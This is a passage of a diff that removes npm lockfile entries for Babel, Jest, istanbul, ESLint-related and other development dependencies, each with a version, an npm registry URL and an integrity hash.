"https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.24.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.24.3.tgz", - "integrity": "sha512-viKb0F9f2s0BCS22QSF308z/+1YWKV/76mwt61NBzS5izMzDPwdq1pTrzf+Li3npBWX9KdQbkeCt1jSAM7lZqg==", - "dev": true, - "requires": { - "@babel/types": "^7.24.0" - } - }, - "@babel/helper-module-transforms": { - "version": "7.23.3", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.23.3.tgz", - "integrity": "sha512-7bBs4ED9OmswdfDzpz4MpWgSrV7FXlc3zIagvLFjS5H+Mk7Snr21vQ6QwrsoCGMfNC4e4LQPdoULEt4ykz0SRQ==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-module-imports": "^7.22.15", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.20" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.24.0.tgz", - "integrity": "sha512-9cUznXMG0+FxRuJfvL82QlTqIzhVW9sL0KjMPHhAOOvpQGL8QtdxnBKILjBqxlHyliz0yCa1G903ZXI/FuHy2w==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.24.1.tgz", - "integrity": "sha512-2ofRCjnnA9y+wk8b9IAREroeUP02KHp431N2mhKniy2yKIDKpbrHv9eXwm8cBeWQYcJmzv5qKCu65P47eCF7CQ==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.23.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.23.5.tgz", - "integrity": "sha512-85ttAOMLsr53VgXkTbkx8oA6YTfT4q7/HzXSLEYmjcSTJPMPQtvq1BD79Byep5xMUYbGRzEpDsjUf3dyp54IKw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.24.4.tgz", - "integrity": "sha512-FewdlZbSiwaVGlgT1DPANDuCHaDMiOo+D/IDYRFYjHOuv66xMSJ7fQwwODwRNAPkADIO/z1EoF/l2BCWlWABDw==", - "dev": true, - "requires": { - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0" - } - }, - "@babel/highlight": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.24.2.tgz", - "integrity": "sha512-Yac1ao4flkTxTteCDZLEvdxg2fZfz1v8M4QpaGypq/WPDqg3ijHYbDfs+LG5hvzSoqaSZ9/Z9lKSP3CjZjv+pA==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha1-p9BVi9icQveV3UIyj3QIMcpTvCU=", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.24.4.tgz", - "integrity": "sha512-zTvEBcghmeBma9QIGunWevvBAp4/Qu9Bdq+2k0Ot4fVMD6v3dsC9WOcRSKk7tRRyBM/53yKMJko9xOatGQAwSg==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.24.1.tgz", - "integrity": "sha512-2eCtxZXf+kbkMIsXS4poTvT4Yu5rXiRa+9xGVT56raghjmBTKMpFNc9R4IDiB4emao9eO22Ox7CxuJG7BgExqA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.24.0" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.24.1.tgz", - "integrity": "sha512-Yhnmvy5HZEnHUty6i++gcfH1/l68AHnItFHnaCv6hn9dNh0hQvvQJsxpi4BMBFN5DLeHBuucT/0DgzXif/OyRw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.24.0" - } - }, - "@babel/template": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.24.0.tgz", - "integrity": "sha512-Bkf2q8lMB0AFpX0NFEqSbx1OkTHf0f+0j82mkw+ZpzBnkk7e9Ql0891vlfgi+kHwOk8tQjiQHpqh4LaSa0fKEA==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.23.5", - "@babel/parser": "^7.24.0", - "@babel/types": "^7.24.0" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - } - } - }, - "@babel/traverse": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.24.1.tgz", - "integrity": "sha512-xuU6o9m68KeqZbQuDt2TcKSxUw/mrsvavlEqQ1leZ/B+C9tk6E4sRWy97WaXgvq5E+nU3cXMxv3WKOCanVMCmQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.24.1", - "@babel/generator": "^7.24.1", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.24.1", - "@babel/types": "^7.24.0", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - } - } - }, - "@babel/types": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.24.0.tgz", - "integrity": "sha512-+j7a5c253RfKh8iABBhywc8NSfP5LURe7Uh4qpsh6jc+aLJguvmIUBdjSdEMQv2bENrCR5MfRdjGo7vzS/ob7w==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.23.4", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@eslint/eslintrc": { - "version": "0.4.3", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-0.4.3.tgz", - "integrity": "sha512-J6KFFz5QCYUJq3pf0mjEcCJVERbzv71PUIDczuh9JkwGEzced6CO5ADLHB1rbf/+oPBtoPfMYNOpGDzCANlbXw==", - "dev": true, - "peer": true, - "requires": { - "ajv": "^6.12.4", - "debug": "^4.1.1", - "espree": "^7.3.0", - "globals": "^13.9.0", - "ignore": "^4.0.6", - "import-fresh": "^3.2.1", - "js-yaml": "^3.13.1", - "minimatch": "^3.0.4", - "strip-json-comments": "^3.1.1" - } - }, - "@humanwhocodes/config-array": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.5.0.tgz", - "integrity": "sha512-FagtKFz74XrTl7y6HCzQpwDfXP0yhxe9lHLD1UZxjvZIcbyRz8zTFF/yYNfSfzU414eDwZ1SrO0Qvtyf+wFMQg==", - "dev": true, - "peer": true, - "requires": { - "@humanwhocodes/object-schema": "^1.2.0", - "debug": "^4.1.1", - "minimatch": "^3.0.4" - } - }, - "@humanwhocodes/object-schema": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.0.tgz", - "integrity": "sha512-wdppn25U8z/2yiaT6YGquE6X8sSv7hNMWSXYSSU1jGv/yd6XqjXgTDJ8KP4NgjTXfJ3GbRjeeb8RTV7a/VpM+w==", - "dev": true, - "peer": true - }, - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", - "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - } - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - 